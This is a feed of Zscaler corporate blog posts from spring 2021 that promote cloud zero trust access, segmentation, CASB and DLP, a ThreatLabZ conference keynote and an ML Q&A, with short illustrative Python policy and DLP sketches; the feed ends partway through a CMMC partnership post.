Research Blogs Feed Zscaler Blog — News and views from the leading voice in cloud security. Distributing the Future: Enable the New Hybrid Workforce with Cloud-Native Zero Trust This post also appeared on LinkedIn. My favorite science-fiction author, William Gibson, once said, "The future is already here—it's just not evenly distributed." The same can be said for zero trust. The rapid expansion of remote work due to the pandemic has forever changed the face of enterprise cybersecurity, and the effects are still rippling across the business landscape. Even as users return to the office, we’ll still need to secure a sizable work-from-anywhere (WFA) population. This new hybrid workforce is here to stay: some people work remotely, some go into the office, and some toggle between the two as needs dictate. As a result, there is no better time than now to implement a zero trust strategy. A rebalancing act The massive move to WFA during the pandemic eroded the foundations of network-centric, castle-and-moat legacy architecture through shifting patterns and sheer volumes of traffic. To compensate, many organizations invested heavily in virtual private network (VPN) technology. As users return to the office, those same VPNs are over-provisioned, depreciating in value, and don’t support ongoing network and security transformation. VPNs lack the necessary flexibility to follow users, devices, and applications to new virtual perimeters. The net result is that security costs and complexity increased, but granular visibility didn’t. Forward-looking IT teams, in turn, are seizing the opportunity to overcome the challenges of VPNs by turning to new cloud-native secure access solutions to help drive innovation both within IT and for the business. Modern cloud-native security solutions extend zero trust principles to enable and secure WFA access to applications, without requiring public exposure or complex network segmentation.
Security, simplicity, and user experience go hand-in-hand in this new model, which allows for seamless access across all the permutations of the hybrid workforce. Regaining your footing with zero trust Zero trust initially envisioned context-based controls for least-privilege access for on-premises users accessing internally hosted apps. But as the pandemic demonstrated, IT teams also require a solution that offers seamless access for remote workers. By extending these tenets to the new hybrid workforce, IT teams can provide secure access to any application or asset without publicly exposing the application, asset, or even the infrastructure that supports access. A zero trust architecture provides security, granularity, and visibility no matter where users, applications, or assets live. At Zscaler, our cloud-delivered zero trust solution, Zscaler Private Access (ZPA), allows IT teams to deliver a consistent, frictionless user experience for employees, third parties, and B2B communication. Access is seamless regardless of whether the user is "off-network" or "on-network"—the network doesn't matter anymore. The policy environment is simplified, becoming user- and app-centric rather than network-centric, and consistent across cloud and data center application environments. Granular policies for context-based access ensure least-privileged connections, combining user and device attributes to permit access only by authorized users on compliant devices. Since zero trust connects users to specific applications rather than allowing endpoints access to the entire network, yesterday’s "virtual private network" evolves into today's secure access service edge (SASE). Public service edges provide transport to remote applications, while private service edges support local and on-premises access. Moreover, by incorporating industry-leading endpoint detection and response (EDR) solutions from CrowdStrike, Carbon Black, SentinelOne, and others, IT can detect and stop dirty devices.
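The context-based, least-privileged decision described above can be sketched as a per-application policy check that combines user and device attributes. The following Python sketch is purely illustrative; the app names, groups, and posture attributes are hypothetical and do not represent ZPA's actual policy model:

```python
from dataclasses import dataclass

@dataclass
class AccessContext:
    user: str
    groups: set              # identity-provider group memberships
    device_managed: bool     # device is enrolled in management
    device_compliant: bool   # posture check passed (patched, EDR running, etc.)

# Per-application policy: which groups may connect and what device posture
# is required. Note there is no "allow subnet" rule anywhere -- access is
# granted per application, never to the network as a whole.
POLICIES = {
    "payroll-app": {"groups": {"finance"}, "require_compliant": True},
    "wiki":        {"groups": {"employees"}, "require_compliant": False},
}

def authorize(app: str, ctx: AccessContext) -> bool:
    policy = POLICIES.get(app)
    if policy is None:
        return False  # default deny: unknown apps are never reachable
    if not ctx.groups & policy["groups"]:
        return False  # user is not in an authorized group
    if policy["require_compliant"] and not (ctx.device_managed and ctx.device_compliant):
        return False  # sensitive apps require a managed, compliant device
    return True

alice = AccessContext("alice", {"employees", "finance"}, True, True)
byod  = AccessContext("alice", {"employees", "finance"}, False, False)
print(authorize("payroll-app", alice))  # True
print(authorize("payroll-app", byod))   # False: non-compliant device
print(authorize("wiki", byod))          # True: low-sensitivity app
```

The key design point is that the same user gets different answers for the same app depending on device posture, and an app absent from the policy table simply does not exist from the user's perspective.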
Browser isolation enables BYOD and unmanaged devices to access applications without the data ever touching the device. API-driven integration with security orchestration, automation, and response (SOAR) solutions frees up expensive human attention to focus on more critical security considerations and priorities. The capabilities above work together to greatly reduce dependency on network perimeter security, increase visibility, and minimize cost and complexity. Furthermore, while ZPA connects users to an enterprise's internal applications, Zscaler Internet Access (ZIA) connects users to SaaS applications and other destinations on the internet. Backhauling everyone’s traffic to a few internet egress points just to send it through a stack of security appliances no longer makes sense: WFA users can leverage the same Zscaler Zero Trust Exchange and access public resources via direct internet connections protected by ZIA. The fundamental zero trust principles of context-based, least-privileged access are increasingly being applied beyond their initial narrow scope of on-premises users connecting to internally hosted applications. Protection of outbound as well as inbound traffic, identity-based access controls for machine-to-machine as well as user-to-machine traffic, and integration of additional context all combine to offer more granular and adaptive access decisions. But nobody does this overnight. Solutions need to work seamlessly across hybrid use cases, protecting legacy resources and infrastructure as well as modernized workflows. The path forward The past year rapidly accelerated existing cloud migration and remote work trends. Traditional security models struggled to accommodate the huge change in traffic flows when the global digital workforce went home en masse. Companies that had already embraced digital transformation absorbed the change and adapted more easily.
In the space of a couple of months, we helped many companies use zero trust to transition their entire workforce to WFA. Now we have the luxury of thinking and planning more strategically for how to best support the evolving hybrid workforce post-pandemic. A continuing theme in 2021 will be the importance of flexible, resilient solutions that adapt to ongoing change. It’s time to seize the zero trust moment! Modern cloud-delivered zero trust architectures apply security functions consistently across an ever-evolving landscape, and will remain a critical component to accommodating and securing the new hybrid workforce. Wed, 05 May 2021 08:00:02 -0700 Lisa Lorenzin Join Zscaler at the ONUG Spring 2021 Virtual Conference Zscaler has been pleased to sponsor ONUG conferences in years past, and 2021 is no exception. This week’s ONUG Spring 2021 Virtual Conference promises to cover the key challenges we all faced and the lessons we learned during the past tumultuous year. In ONUG’s words, “We will digest the changes we experienced together and discuss the technologies and strategies critical to our digital transformation business models in 2021 and beyond.” At Zscaler, we’ve been working closely with customers on those very matters. A year ago, it was all hands on deck, with teams working around the clock to help companies get their employees working securely from home. It quickly became obvious that the organizations that had begun to transform their network and security infrastructures were far more prepared for the challenges of 2020. Having reduced or eliminated their reliance on legacy technologies that can’t scale, such as VPNs and network firewalls, they could pivot quickly to a fully remote workforce securely accessing apps in multiple clouds and data centers. So where do we go from here? The last year has shown us that digital transformation is a business imperative. 
It’s enabling new business models and creating digital links between employees, customers, suppliers, and partners that improve collaboration and speed. In today’s world, your employees are on the internet now more than they are on the corporate network, and your applications are more likely to be in the cloud in the form of SaaS, such as Microsoft 365, and through the migration of private apps to AWS, Azure, and Google Cloud Platform. This transformation, in which business increasingly takes place over the internet, results in a dramatically expanded attack surface. Security must be embedded into every connection, no matter where it takes place or whether it’s initiated by a person, application, IoT device, or system. It must be delivered in the cloud, closer to where the majority of users and business assets are now centered. And it must be built on zero trust to reduce business risk. Zscaler has developed a comprehensive platform of services that enable secure transformation. It’s called the Zero Trust Exchange, and it’s helping IT leaders embrace cloud-delivered zero trust, while delivering fast, seamless, and secure access across their entire business ecosystem. You can hear a lot more about it at the ONUG Spring 2021 Virtual Conference, May 5-6, 2021. We look forward to sharing with the ONUG Community and Conference attendees how Zscaler helps organizations move away from legacy security technologies that were not built for today’s workforce and enables secure and efficient work-from-anywhere experiences built on zero trust. Please join us at these ONUG sessions. Zscaler Keynote Address: May 6 at 2:55 PM ET Accelerate your digital transformation with zero trust. The cloud and mobility are powerful enablers of digital transformation, but many IT organizations are grappling with legacy architectures and processes that haven’t evolved much in decades. 
When applications lived in the data center and users were connected to the network, it made sense to invest in a hub-and-spoke architecture and protect it with a castle-and-moat security perimeter. But today, a new approach to security is needed, one built from the ground up with zero trust to securely enable businesses to take full advantage of the agility, efficiency, and resiliency of the cloud. In this session, Zscaler CEO Jay Chaudhry talks with Gregory Simpson, Former CTO and AI Leader for Synchrony Financial, about his experiences leading his organization into today’s cloud-first world. Zscaler Proof of Concept: May 5 at 1:10 PM ET This Proof of Concept is also being shown in the Zscaler Virtual booth over the course of the two-day virtual event. Zscaler Open Session: May 6, at 2:20-2:50 PM ET Enabling Enterprise Digital Transformation – Illustrated You’ve probably been hearing a lot about digital business transformation, but has anyone talked to you about what it means for your organization? Why does it matter? What does it entail, and how do you start? In this video whiteboarding session, you’ll have the chance to hear from Zscaler's Solution Architect, Brian Deitch, about the drivers of digital transformation, get answers to your questions, and learn how to take the first steps—or the next steps—on your journey. The session will cover a range of topics, including zero trust, the changing branch architecture, IT simplification and cost reduction, the need to support work-from-anywhere, and the benefits of cloud-native security that supports secure, any-to-any connectivity. We look forward to seeing you at the event. Be sure to register today using Zscaler’s exclusive free passcode. Tue, 04 May 2021 07:00:01 -0700 Sabrina Alves Network Segmentation: Issues and Opportunities to Look Beyond Data centers today are sprawling, highly complex, interconnected behemoths. 
In a large enterprise, managing just one on-premises data center could prove challenging, but the reality is that most organizations have to contend with multiple data centers spanning on-premises, virtual, and cloud. Wherever the applications live, the fact remains that organizations must implement segmentation to manage security, compliance, performance, and more. To address these challenges, many organizations use a combination of technologies, such as virtual local area networks (VLANs), virtual routing and forwarding (VRFs), physical or virtual firewalls, and native cloud and container security products. However, using these technologies to segment an organization's applications is a significant operational task and can negatively affect cost and complexity—issues made worse if adequate security controls do not accompany each segment. The divider and the protector Using VLANs and VRFs to organize and cordon off parts of the network comes with some significant benefits. For one thing, networking teams can achieve logical separation of the network without investing in new hardware (if the data center is on-premises) or spinning up new hosts. With fewer hosts per subnet to manage, network performance and monitoring improve. Plus, a VLAN is an opportune place to attach network- or host-based firewalls. Doing so means network and security teams can control what traffic flows in, out, and between zones on the network, protecting against compromise and meeting compliance and audit mandates. The one-two punch of a VLAN with a firewall provides demonstrable attention to data segregation and gives organizations a better chance of limiting the blast radius when a network compromise occurs. For instance, a corporation's guest traffic should rarely have reason to access the finance department's data, nor should HIPAA data be accessible by marketing applications.
Network segmentation creates the mandatory boundaries between collections of sensitive network data/applications/traffic, and attaching a firewall protects data/apps/traffic from extra-segment threats. For years, organizations have been using VLANs and overlaying firewalls to organize and secure networks. It's still a reliable approach to controlling north-south (inside vs. outside) traffic flow. Nonetheless, the VLAN+firewall method includes significant drawbacks that have resulted in organizations abandoning major network segmentation or microsegmentation projects or merely leaving an "any-to-any" policy set due to the complexity of maintaining rules in a dynamic environment. Lack of segmentation and overly permissive controls, in turn, have facilitated some of the noisiest network compromises to date. Such attacks could have been prevented from propagating if properly secured network segmentation had been in place. A segmentation project requires organizations to know and understand all of their networks' assets. Next, they have to determine what boundaries or zones make sense based on business and compliance needs. Then they have to begin the actual work of implementing the enforcement points, which may require upgrades to existing virtualization or infrastructure components that add considerable risk in a brownfield environment. Some organizations will use greenfield environments to begin their segmentation journey, utilizing new toolsets in SDN, cloud, or container platforms. These environments quickly become problematic as they scale or migrate to multi-vendor or multi-cloud solutions. Other considerations, such as multiple availability zones, stretched layer 2, and auto-scaling, are standard practice, so the security solution will need to address these environments as well. The potential for misconfiguring a security policy during implementation is high due to the complexity of today's network architectures.
The margin for error becomes more significant in an environment where the organization does not control the network infrastructure, such as a hybrid cloud or virtual environment. Complexity increases further when cascading firewalls become the method of enforcement. Additional firewalls mean additional cost and configuration with multiple levels of complexity. Imagine if you had one thousand servers and each server talked to five different devices. That is potentially 5,000 firewall policies. It becomes unmanageable. Gartner, in a report on network security policy, wrote: "Through 2023, 99% of firewall breaches will be caused by firewall misconfigurations, not firewall flaws." Unfortunately, configurations aren't the only problem organizations encounter when trying to segment with network-based segmentation. These controls traditionally use address-based identity groups to facilitate communication between hosts, servers, or applications. In modern application environments, though (primarily virtual, container, and cloud networks), this type of segmentation is not granular enough to provide the level of security organizations require. Additionally, the possibility of hijacking or piggybacking on these communications (e.g., address resolution protocol attacks, MAC attacks) could result in lateral threat movement and malicious activity on traffic that is already inside a segment. Unbundling the operational nightmare From a governance perspective, setting up and managing network-based security in a hybrid cloud data center is an operational nightmare. Frequent user or address changes occur, and critical business applications scale vertically or horizontally on the network (seemingly) at the speed of light. All of this equates to ongoing manual policy definition, review, change, and exception handling. Furthermore, the aforementioned business-critical applications cannot withstand the downtime associated with changing segments and adding permissions.
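The back-of-the-envelope arithmetic above can be made concrete. This small Python sketch just illustrates how address-based rule counts grow with the number of allowed flows; the full-mesh case is an added illustration of the worst-case growth, not a figure from the original text:

```python
# With address-based firewall rules, every (server, peer) flow that must be
# permitted typically needs its own policy entry, so the rule count grows
# linearly with flows per server.
def address_based_rules(servers: int, peers_per_server: int) -> int:
    return servers * peers_per_server

print(address_based_rules(1000, 5))  # 5000 rules, as in the example above

# Worst case: if every server talked to every other server (a full mesh),
# the number of directed flows -- and therefore candidate rules -- grows
# quadratically with the server count.
def full_mesh_rules(servers: int) -> int:
    return servers * (servers - 1)

print(full_mesh_rules(1000))  # 999000 directed flows
```

Either way, the count is driven by network addresses rather than by the much smaller number of applications, which is why rule sets become unmanageable as environments scale.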
And if there is one thing network admins can be sure of, it's that both the network and the applications that communicate on it will change. Even with automation, the amount of work required to implement segmentation and manage firewall rules is enormous—and a primary contributing factor to slowed or stalled segmentation projects. Here at Zscaler, we're firm believers in segmentation. What we can't get behind, however, is the complexity and operational overhead attached to creating segments based on the ephemeral network information associated with cloud and virtual networking. Our technology allows organizations to achieve application segmentation based on the cryptographic identity of the applications and services communicating, rather than on network infrastructure. Using application identity as the control point for decision-making means that the environment can change (as networks often do) while the protection remains. Further, Zscaler decreases the implementation and management burden of network segmentation/microsegmentation with machine-learned policies that can be automatically applied and automatically adapt even when network constructs change. No more manual rule creation, tuning, or exception handling, yet the same level of assurance that the organization will meet security, compliance, and audit requirements. Tue, 04 May 2021 08:00:02 -0700 Frank Dagenhardt Think CASB Will Solve All Your Problems? Think Again. What’s new in the world of Data Protection? For a closer look at how cloud apps are increasing data risk and what role CASB can play in your data protection strategy, be sure to check out our new Data Protection Dialogues episode on How to select the right CASB. Like most progressive companies, you've probably got CASB on your shopping list. Cloud applications have changed everything.
Your sensitive data has left yesterday's on-prem networks and is now distributed everywhere, with your users accessing this sensitive information from anywhere with unmanaged devices. You need more control over your data than ever before; however, legacy, network-centric security tools offer little to none. So, CASB seems like a natural next step, right? Think again. While CASB seems to restore the control your organization needs, your security posture is only as strong as the comprehensive security strategy you put in place around the tools and technologies you purchase. That said, let's explore how you can build a best-of-breed CASB strategy. Why is CASB so hot? Cloud applications have transformed everything and, chances are, your organization could be using too many to count across all areas of your business. While the agility of the cloud is undoubtedly game-changing, these applications rely on your company’s most prized possession–data–to operate. This brings increased risk to your business, as moving data outside of your network means it’s easily accessible to authorized users and attackers alike unless the right security precautions are in place. API CASB, also known as out-of-band CASB, can govern data-at-rest in these applications and prevent dangerous file sharing and oversharing. Considering that in the old data center world, you may not have had great control over who could access and share your app data, CASB seems like a giant leap. While this is true, we must remember that CASB is just part of a larger, more holistic data protection strategy for today’s cloud-first world. The convergence of CASB, SWG, and DLP Essentially, cloud applications are just a destination that users connect to, which means that controlling user-to-destination connections leads most enterprises to consider a secure web gateway (SWG) solution.
SWGs are designed to control what users can and cannot access, and the security industry is quickly realizing that there’s a natural overlap between SWG and CASB data protection, not to mention the need for DLP to glue everything together. So what does this look like? When you think about it holistically, it becomes a bit more clear. Start with inline SWG/CASB to control what locations and cloud apps your users can and cannot connect to based on risk. With that setup, you’ve got the right plumbing for your data flows. But should the data even leave the premises? Add DLP to the mix to quickly find and control sensitive data in motion. Lastly, dial in API CASB to make sure any data that made it up to your cloud apps gets secured against accidental sharing or data loss. Since you already have DLP, you can even bring your same sensitive data controls up to your API CASB, which makes life much simpler. Do you have the right CASB mindset? Now that we can see the big picture, what should be the right approach when formulating a foolproof CASB strategy? Architecture A comprehensive CASB strategy starts with a unified, cloud-delivered zero trust platform that handles your business-critical traffic inline instead of relying on API CASB and hard-to-manage, hard-to-scale point products. Moreover, this platform must be powerful enough to inspect SSL traffic across all ports for hidden threats to your data. Lastly, from an architectural standpoint, your zero trust platform should be fully integrated, meaning it can handle other security needs beyond data protection. This includes securing local breakouts and identifying and remediating advanced threats via AI and ML sandboxing. Finding a platform that does all of this will minimize operational complexity. Integrated DLP Next, once you have the right architecture, it’s all about centralizing on a unified, best-in-class DLP engine.
Unfortunately, many companies that don’t do this end up with multiple DLP policies spread over network appliances, endpoints, and point-product CASB, causing many unwanted complexities and administrative challenges. On the other hand, centralizing on one DLP policy makes protecting your sensitive data far easier, as it allows you to create a single DLP policy that is applied to all areas of your business, including branch offices, mobile users, and SaaS apps, to secure data-at-rest. Real-time data protection Although out-of-band CASB is easy to implement and satisfies the need to control data-at-rest, security teams will often move on to other projects without putting the proper tools in place to improve real-time visibility and inspection. A complete data protection platform built for both inline and API inspection provides a granular look at data-at-rest and data-in-motion to help you and your team make better data protection decisions and quickly identify unauthorized uses of shadow IT. Essentially, think of inline data protection as the first building block to set up the proper paths to the apps your data should go to vs. the ones it shouldn’t. Governing data-at-rest Now, with the right solution in place to control what data should leave your network and which sanctioned apps need to be secured, you’re ready to start thinking about out-of-band CASB to protect your data at rest. Here’s where things get easy. Remember those policies you set up when deploying your integrated DLP? Those inline policies are ready to be applied to your data-at-rest. Overlay those policies on your SaaS data, and you’ll be able to find the sensitive data you need governance over, allowing you to quickly identify who can access and share this data. For example, you can make sure this sensitive information isn’t dangerously shared via open internet links or overshared to unauthorized groups.
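As an illustration of the "define once, apply everywhere" idea above, here is a minimal Python sketch in which a single set of sensitive-data patterns drives both an inline check on data-in-motion and an out-of-band scan of data-at-rest. The patterns and function names are hypothetical, not Zscaler's actual DLP engine:

```python
import re

# One central DLP policy: named sensitive-data classes and the (simplified)
# patterns that detect them. Real engines use far richer detectors.
DLP_POLICY = {
    "ssn":         re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "credit_card": re.compile(r"\b(?:\d[ -]?){15}\d\b"),
}

def classify(text: str) -> set:
    """Return the set of sensitive-data classes found in a blob of text."""
    return {name for name, pattern in DLP_POLICY.items() if pattern.search(text)}

# Inline enforcement point: block an upload in motion if it matches policy.
def inspect_upload(payload: str) -> str:
    return "block" if classify(payload) else "allow"

# Out-of-band enforcement point: flag files already at rest in a SaaS app,
# reusing exactly the same classify() policy.
def scan_at_rest(files: dict) -> list:
    return [name for name, body in files.items() if classify(body)]

print(inspect_upload("employee SSN: 123-45-6789"))  # block
print(scan_at_rest({"ok.txt": "hello",
                    "leak.txt": "4111 1111 1111 1111"}))  # ['leak.txt']
```

Because both enforcement points call into the same policy table, a new pattern added there immediately applies to data in motion and data at rest alike, which is the administrative simplification the text describes.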
It’s tremendously empowering to have this level of control, which is something that, until now, didn’t really exist in the traditional, data center application world. Best of all, when you have the right security cloud platform, you can start scanning these SaaS apps for the arrival of dangerous malware, using sandboxing and AI/ML to quickly identify lurking files that shouldn’t be co-mingling with your precious sensitive data. Maintaining security posture Now that you have total control over your sensitive data-at-rest and in-motion, it’s time to think about your applications themselves and whether or not they are vulnerable to attacks via a misconfiguration during deployment. Considering that many of the world’s most significant breaches are brought about by simple cloud misconfigurations, ensuring your applications are in good standing is an essential box to check. By implementing Cloud Security Posture Management and SaaS Security Posture Management, you can easily find these dangerous gaps and quickly remediate them. Therefore, when building out your CASB and DLP strategies, look for a solution with built-in compliance frameworks and the ability to continuously scan for public and SaaS app misconfigurations. Again, while considering your CASB and DLP strategy, look for a solution that incorporates Browser Isolation for added, necessary security. Controlling unmanaged BYOD If the last year taught us anything, it’s that work-from-anywhere is here to stay—in some form—for the foreseeable future. While this flexibility is terrific for businesses and employees, it does yield some security challenges, such as enabling third-party access to sensitive data without incurring additional risk and securely providing unmanaged BYOD devices access to your data so these third parties can do their jobs.
These challenges are typically solved with reverse proxies; however, doing so is incredibly complex and often fraught with usability issues, resulting in poor user experiences. A more straightforward approach is Browser Isolation, which streams data to third-party devices in the form of pixels. By streaming data as pixels, BYOD devices can't download, copy/paste, or print the data they're viewing. It's fully interactive within the browser, but nothing persists on the BYOD device, significantly lowering risk. Rethinking it all Sure, simple CASB does offer more control over your data than legacy, network-centric approaches. That said, CASB is only one aspect of a comprehensive security strategy that considers user and device access, visibility, remediation, compliance, and decreased risk. For a more in-depth look into what it takes to build a comprehensive data protection strategy, be sure to check out our new video series, Data Protection Dialogues. Thu, 29 Apr 2021 12:25:42 -0700 Steve Grossenbacher Insight from the Front Lines: Zscaler ThreatLabZ to Give Keynote at Zenith Live We’re excited to announce that Zscaler ThreatLabZ will be a part of our keynote lineup at this year’s Zenith Live on June 15 and 16. Backed by the world’s largest security cloud, Zscaler ThreatLabZ is our internal research team dedicated to uncovering and investigating emerging threats, while educating the cybersecurity world about how to protect against them. A global team of security experts, researchers, networking experts, and computer scientists, ThreatLabZ is responsible for analyzing and eliminating threats across the Zscaler security cloud, as well as keeping a finger on the pulse of the world’s threat landscape—with the intent of making the internet safer for all.
What you can expect from ThreatLabZ at Zenith Live Our renowned ThreatLabZ experts will present in-depth research into emerging threats discovered within the Zscaler cloud, which processes nearly 2 million transactions per second. During the keynote, Deepen Desai, CISO and VP of Security Research and Operations at Zscaler, will dissect recent attack chains, including what types of attacks are trending, why these attacks are becoming more prominent, and what you can do to protect your organization from them. This presentation includes a close look at threats targeting supply chains, Microsoft Exchange servers, ransomware, and more. You’ll also get an exclusive preview into Zscaler’s disruptive protection suite that unifies our industry-leading threat intelligence, world-class experts, and innovative technology to give you peace of mind from the most advanced attackers. Check out these ThreatLabZ resources prior to Zenith Live Because Zscaler security is cloud-delivered, we have the unique ability to analyze every byte of traffic routed to our cloud before it’s sent back to the user. This ability to handle massive amounts of traffic without latency enables us to automatically and accurately track attack trends by threat type, location, threat actor type, and other criteria. Because of this, ThreatLabZ has put together a series of dashboards that can be found publicly on our site. These dashboards provide a real-time view into the number of transactions processed by the Zscaler cloud, policies enforced, and threats blocked. At any moment, hundreds of thousands of concurrent events are being managed by Zscaler cloud security, with billions of activities collected and processed daily. Let’s take a closer look at some of the aspects that comprise the global threat landscape we are tracking.
Cloud Activity Dashboard This dashboard shows how hard our security cloud is working – processing more than 50 billion transactions daily, applying almost 3 billion policies across all customers, and blocking more than 70 million threats per day. Global Threat Map Dashboard This interactive map illustrates the threats that Zscaler has blocked during the past 24 hours using antivirus, advanced threat protection, and sandbox technology. Global Internet Threat Insights A graphical representation that displays the movement of global threats, showing countries of origin, target destinations, and threat types. Cloud Application Dashboard An interactive view of cloud application trends on the Zscaler platform. Data can be filtered by application, date range, and industry verticals. Encrypted Traffic Dashboard This dashboard shows the volume of encrypted traffic as a percentage of total traffic moving across the cloud. Global Enforcement Dashboard A depiction of the hourly transactions, threats blocked, and policies enforced worldwide in the Zscaler cloud. Internet of Things Dashboard How much traffic is generated by things? More than you think. Work From Anywhere Trends Dashboard The latest dashboard from ThreatLabZ shows how enterprise traffic has changed since the beginning of the pandemic. ThreatLabZ also publishes research reports, blogs, and papers about their findings and how organizations can adapt to the ever-evolving threat landscape. What to expect at Zenith Live 21 Zenith Live is a virtual conference focused on secure digital transformation, showcasing what’s possible with the flexibility of true zero trust. With more than fifty breakout sessions across six tracks, hands-on training, executive forums, and architecture workshops, Zenith Live is designed to show IT leaders across all disciplines how to lead an organization securely into the modern era, where you can innovate faster, reduce risk, and work smarter—all at the speed of cloud.
Here’s what else you can expect at this year’s event: Expert Speakers Hear visionary predictions for the future of the digital world and how CIO, CTO, and CISO pioneers from Fortune 500 companies successfully enacted their secure digital transformation initiatives. In-Depth Breakout Sessions Select from more than 50 sessions in six tracks: Foundations Zscaler Expert CloudOps/DevSecOps Network Professional Security Professional Public Sector Architecture Workshops Zscaler experts teach an interactive session on how a zero trust architecture can free you from past constraints so you can move securely to the digital future—at cloud speed. Women in IT Exchange Tune in to a fireside chat with IT leaders on professional direction and practical approaches to breaking down the barriers to individual success. Live Q&A/Demos Zscaler professionals will lead hands-on interactive training sessions on Zscaler’s Zero Trust Exchange Technology. Training Zscaler cloud operations and cybersecurity experts will lead detailed hands-on technical training and certification programs. Register now for this one-of-a-kind, two-day immersive experience. Wed, 28 Apr 2021 09:00:01 -0700 ThreatLabz How and When to Embed Machine Learning in Your Product To help companies think about how to build ML into their product infrastructures at scale, CapitalG held a Q&A session with Howie Xu. It was originally published March 15, 2021, on Medium. Machine learning can enable a company to make sense of mass quantities of data, separate noise from signal on an immense level, and unleash a product’s ability to truly scale. Many CapitalG companies have embedded ML into their products with great success (and in fact this is an area where CapitalG often provides hands-on support and training), but getting there is no easy feat. Embedding ML is among the most complex tasks that product teams can attempt.
To help companies think about how to build ML into their product infrastructures at scale, we decided to sit down with Howie Xu, VP of Machine Learning & AI at leading cybersecurity company Zscaler (NASDAQ: ZS). A CapitalG portfolio company since 2015, Zscaler is now a large, publicly traded global firm with more than 2,000 employees worldwide. In this Q&A, Howie discusses the value that machine learning can provide, when to use ML (and, maybe more importantly, when not to), and how to organize teams for ML success. Johan: Howie, before we dive in, can you describe what Zscaler does and your role as VP of Machine Learning and AI? Howie: Sure! Zscaler enables secure digital transformation by rethinking traditional network security and replacing on-premises security appliances to empower enterprises to work securely from anywhere. You can think of us as the “Salesforce of security.” Zscaler is the world’s largest inline security cloud company, securing more than 150 billion transactions per day and protecting thousands of customers from cyberattacks and data loss. My role is to drive the technology, as well as the awareness and use cases, for AI-based product delivery at Zscaler. A lot of my role actually involves close collaboration with other internal teams, like the rollout of the world’s first AI-powered cloud sandboxing engine. Johan: What advice would you give a founder, CTO, or product leader who has achieved product-market fit and is looking to embed ML in their product to help it scale? Howie: My best piece of advice is to realize that AI is merely a means to an end. I think of it as a giant hammer: it can accomplish huge tasks, but it’s overkill in many scenarios. For successful implementations, seek out the 10X opportunities. Anything below that threshold, like a 20–30% increase in speed or efficiency, simply isn’t worth the effort required. In those cases, it makes more sense to use conventional technology.
I’ve found that the greatest challenges to ML success often amount to challenges in alignment rather than technology. So much of what leads to a successful ML implementation comes down to successful stakeholder alignment and education. This may sound trivial, but it’s absolutely not. Bringing AI empathy and literacy to technical and non-technical teams, and jumping from what computer scientists have done for the last 20 to 30 years to what the AI team truly needs, is not linear and definitely not easy. You have to put the time into education and alignment, or the teams aren’t going to collaborate with you closely enough, and you won’t be able to get the domain knowledge or the data you need to make the algorithms work well. Johan: You have both founder and scale-up perspectives, having founded an AI/ML startup and now overseeing the embedding of AI & ML at Zscaler. What’s different about doing this at scale at a large, established company like Zscaler, with 150B transactions and 100M threats detected per day? Howie: At Zscaler, my greatest opportunity is having an infinite amount of data; likewise, my greatest challenge is having an infinite amount of data. But it is a fantastic problem to have. Most AI startups struggle to find sufficient data. In fact, a lot of security companies claim to use ML before they’re actually able to because they just don’t have enough data yet. We, on the other hand, have a trove of it. But it is challenging for us to process all of it. For starters, that’s just too much data for even the most powerful computers and largest teams to analyze. On top of that, issues like user privacy and security are of paramount importance and must be carefully factored into the equation. And of course, on top of all of that, we have to balance speed and cost in every implementation. Being able to process 99.99% of data would have no value if it took too long to achieve it.
The challenge for companies at scale is to architect ML to be both “massive scale data proof” and “existing product compatible.” We have to figure out which data to analyze, and we constantly face a spectrum of tradeoffs that necessarily come with having access to data on such a massive scale. Johan: AI & ML can seem like buzzwords promoted as near-panaceas for all business problems, which is obviously unrealistic. In what kinds of scenarios and applications are AI & ML most promising? Howie: It may sound simple, but within cybersecurity, AI & ML are most promising in use cases requiring both speed and accuracy. These are the scenarios in which conventional technology simply can’t scale to meet the needs. On the flip side, it’s important to understand that ML may generate a non-trivial amount of false positives. However, if you leverage the technology right, false positives are not a showstopper. For example, let’s say that I can use AI to determine that 95% or even 99% of logs, alerts, or files are not threats. We’re still going to investigate what’s left, and typically what’s left will be the most serious threats requiring closer investigation. Creating filters with AI allows teams to spend the time necessary to assess the more critical risks. Johan: In your experience, what is the best way to organize the product and engineering teams to embed ML into an existing product? Howie: There is no correct or incorrect way. What’s right will vary by company, but at Zscaler we organize ML as an independent functional team reporting directly to the president of the company. This structure helps us in a number of ways: With hiring and retention, because it provides the opportunity for top data science PhDs to work with each other. The opportunity to collaborate with high-caliber peers is often extremely important in the recruiting and retention of these highly sought-after specialists.
Providing broad coverage across the company, as well as insight into the organization’s potential use cases for AI implementations. Enforcing best practices, given our broad company-wide mandate. The challenge with this structure is that more time needs to be spent communicating and collaborating with other functional organizations. I believe that’s a worthwhile tradeoff and have found this to be a highly successful organizational structure. Johan: Zscaler participated in ML@CapitalG, our program in which Googlers train engineers and product teams at our portfolio companies on machine learning. You had many of your team members participate in the program — how important is it to train not just engineers but the teams around them, such as product managers or UX/UI designers? Howie: My machine learning engineers loved the training on Google’s AI cooking recipes. But it is more than that. I’ll give you a specific example to show the importance. Amir Levy, one of our product managers who attended the training, sought me out on the session’s last day. Back at the office, he grabbed me to brainstorm a use case he had thought about during the training. Within a few short months, the output of that brainstorm was already significantly improving our company’s bottom line. Johan: What tools or resources do you recommend to startups and more established companies implementing AI & ML? Howie: We don’t use all of them, but here are some tools and resources for consideration: AutoML, H2O.ai, DataRobot, and Google Cloud Platform for exploring use cases. More than anything, though, I highly recommend seeking out the advice of peers who can discuss what worked, what failed terribly, and why. Many of the biggest AI failures I know of have not been on the technology side; they’ve been due to a lack of alignment between business and technical priorities.
I’ve been incredibly fortunate to benefit from the knowledge and support of my company’s CEO Jay Chaudhry and President Amit Sinha, as well as my peers in the company and in the industry. Johan: What accomplishments of your team’s are you most proud of this past year and why? Howie: Protecting our customers by processing over 150 billion transactions and blocking 100 million threats per day is not a joke. Helping Zscaler to do this is our biggest accomplishment. There are a lot of things happening along the way, of course, including the world’s first AI-powered cloud sandboxing engine with a successful integration of the TrustPath technology after the acquisition, all the unknown threats we helped to discover via AI/ML, the anomaly detection functionality we showcased at Zenith Live in December, and some very interesting AIOps progress we made recently. Tue, 27 Apr 2021 09:00:01 -0700 Howie Xu Partnership with Steel Root to Support CMMC Requirements for Defense Contractors In an effort to strengthen federal supply chain security, more than 300,000 defense contractors will need to meet Cybersecurity Maturity Model Certification (CMMC) requirements over the next five years, demonstrating they can protect Controlled Unclassified Information (CUI). While CMMC launched prior to the SolarWinds attack, the massive breach underscores the hard requirement to improve and normalize cyber requirements for the organizations that support federal missions. Not only will CMMC be required on all new 